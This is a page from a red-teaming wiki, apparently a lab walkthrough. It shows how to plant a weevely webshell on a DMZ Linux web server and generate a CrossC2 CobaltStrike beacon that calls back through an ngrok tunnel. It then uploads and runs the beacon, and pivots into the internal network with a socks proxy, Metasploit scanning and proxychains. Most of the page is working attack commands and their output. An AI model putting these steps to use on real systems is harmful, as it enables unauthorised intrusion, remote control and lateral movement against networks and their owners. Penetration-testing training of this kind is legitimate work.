Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Webshell - weevely
  • ngrok
  • CrossC2
  • Create CS Listener
  • Pivoting using CS
  • Metasploit for pivoting internally
  • Take advantage of proxychains tool
  • Bonus
  • References

Was this helpful?

  1. Command and Control (C&C)
  2. CobaltStrike 101

Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

Pivoting internally over DMZs using weevely + ngrok + CobaltStrike COMBO via a Linux machine

PreviousCobaltStrike 101NextExtras + Plugins

Last updated 4 years ago

Was this helpful?

In this laboratory, we will understand how to use a simple webshell to deploy a CobaltStrike beacon on a Linux target system mainly available and placed on a DMZ and use it for pivoting through this machine into the internal network. This is a common scenario many times used during my red teaming assessments, for instance, when I find a flaw that permits the uploading of a webshell into the web-server. Let's do it.

Webshell - weevely

I use weevely many times to deploy my webshell remotely. More information about this tool .

weevely generate <password> <path>
weevely <URL> <password> [cmd]

Example how to access the target machine:

kali:> weevely http://target_system/evil.php my@password

[+] weevely 4.0.1

[+] Target:     target:/tmp
[+] Session:    /home/kali/.weevely/sessions/target/...
[+] Shell:      System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 
target:/tmp $ 

At this moment, we got a remote connection with the target server. It's time to prepare ngrok + CobaltStrike beacon to pivot into the internal network from our localhost connection.

We can use a configuration file as described on the link above, or simply by using the following command to start a new server on port: 8083:

./ngrok tcp 8083

Now, it's time to create the CobaltStrike stager.

CrossC2 framework allows us to generate CobaltStrike's cross-platform payloads, e.g., Linux x64 and x86 beacons.

We can create an x64 or x86 payload depending on the target system architecture.

Tip: use the uname -a command to check the target version.

ngrok_ip: The resolved IP address from the ngrok address. ngrok_port: The assigned port to the ngrok address.

./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross
./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x64 ./cross

The x64 payload was generated, and we can check it using the file command:

kali@kali:~/Desktop$ file cross
cross: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header

Now, it's time to upload it into the target Linux webserver using weevely:

target:/tmp $ :file_upload /home/kali/Desktop/cross /tmp/cross
True
target:/tmp $
target:/tmp $ chmod +x cross

Create CS Listener

The next step is to create the CS listener. We need to add our internal IP address on:

  • HTTPS HOSTS

  • HTTPS HOST (STAGER)

and the local port (8083) where the ngrok connection is mapped - HTTPS PORT (C2).

After that, the payload can be executed on the weevely webshell:

./cross

Pivoting using CS

In the next phase, we will:

  • Create a socks4

  • Use Metasploit to pivot internally; or

By interacting with the new machine, you have the following options:

We can create the new socket using the CS console, or by clicking on the target machine.

Clicking on "Launch" button, the socket is created on the local machine (attacker machine). We can confirm it by using the following command:

netstat -antp | grep "LISTEN"
(...)
tcp6       0      0 :::14833                :::*                    LISTEN

Metasploit for pivoting internally

Accessing the "Proxy Pivots" menu, we can get the command to pivot through MSF.

After getting the command above, we can start msfconsole and paste the command to set up the new tunnel and scan hosts available on the internal network.

msfconsole
setg Proxies socks4:10.0.2.15:14833
use auxiliary/scanner/smb/smb_version
set RHOSTS=192.168.0.0/24
run

Take advantage of proxychains tool

To use proxychains, first, we need to configure the new socks by accessing the /etc/proxychains.conf file.

sudo vim /etc/proxychains.conf 
socks4 10.0.2.15 14833

After that, we can use a lot of tools, such as crackmapexec, nmap, impacket-tools, and so on, by using the following combination:

proxychains nc 192.168.x.x 445 -v

Bonus

Creating CobaltStrike random C2 profile

CobaltStrike C2 malleable profiles

References

In this step, you can use a trustable machine (e.g., EC2 instance from AWS) or simply ngrok. ngrok is a very useful tool that allows us to expose our localhost server through any NAT or firewall - and masquerading our public IP address - of course

And yeah, we got it

Take advantage of proxychains tool (my favorite approach)

🤓
😎
👾
here
ngrok
CrossC2
PivotingRed Teaming and Malware Analysis
GitHub - threatexpress/random_c2_profile: Cobalt Strike random C2 Profile generatorGitHub
GitHub - xx0hcd/Malleable-C2-Profiles: Cobalt Strike - Malleable C2 Profiles. A collection of profiles used in different projects using Cobalt Strike https://www.cobaltstrike.com/.GitHub
HOWTO: Port Forwards through a SOCKS proxy - Cobalt Strike Research and DevelopmentCobalt Strike Research and Development
VulnStack域环境靶场渗透Wh0ale's Blog
Logo
Logo
Logo
Socks commands were highlighted.
Logo
Logo